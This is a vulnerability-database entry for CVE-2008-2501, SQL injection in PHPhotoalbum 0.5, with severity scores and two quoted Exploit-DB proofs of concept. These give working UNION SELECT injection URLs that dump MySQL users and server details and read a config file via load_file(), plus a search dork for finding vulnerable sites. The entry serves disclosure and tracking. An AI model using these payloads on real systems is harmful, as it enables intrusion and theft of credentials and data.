CVE-2008-2501
Published 2008-05-29
Priority: P3 (43), high; CVSS 2.0: 7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.01% (58.7th percentile)
Multiple SQL injection vulnerabilities in PHPhotoalbum 0.5 allow remote attackers to execute arbitrary SQL commands via the (1) album parameter to thumbnails.php and the (2) pid parameter to displayimage.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| henning_stoverud | phphotoalbum | — | — |
No detection rules found.
Exploit-DB
PHPhotoalbum 0.5 - SQL Injection
exploitdb·2009-12-21
---
# Title: PHPhotoalbum Remote sql injection Vulnerability
# Tested on: windows
http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--
http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--
Exploit-DB
PHPhotoalbum 0.5 - Multiple SQL Injections
exploitdb·2008-05-28
---
###############################################################################
#
# Name : PHPhotoalbum v0.5 Multiple Remote SQL Injection Vulnerabilities
# Author : cOndemned
# Dork : intext:PHPhotoalbum v0.5
# Greetz : ZaBeaTy, str0ke, TBH, Hawk, doctor, Sandtalker, Avantura ;**
#
###############################################################################
Proof of Concept :
http://[host]/[path]/thumbnails.php?album=-1+union+select+concat_ws(0x10,now(),version(),user(),database())/*
http://[host]/[path]/displayimage.php?pid=-1+union+select+1,2,3,now(),version(),user()/*
###############################################################################
#
# Together we stand tall, Not gonna crash, not gonna fall - Children of Bodom
#
##
No writeups or analysis indexed.
Published: 2008-05-29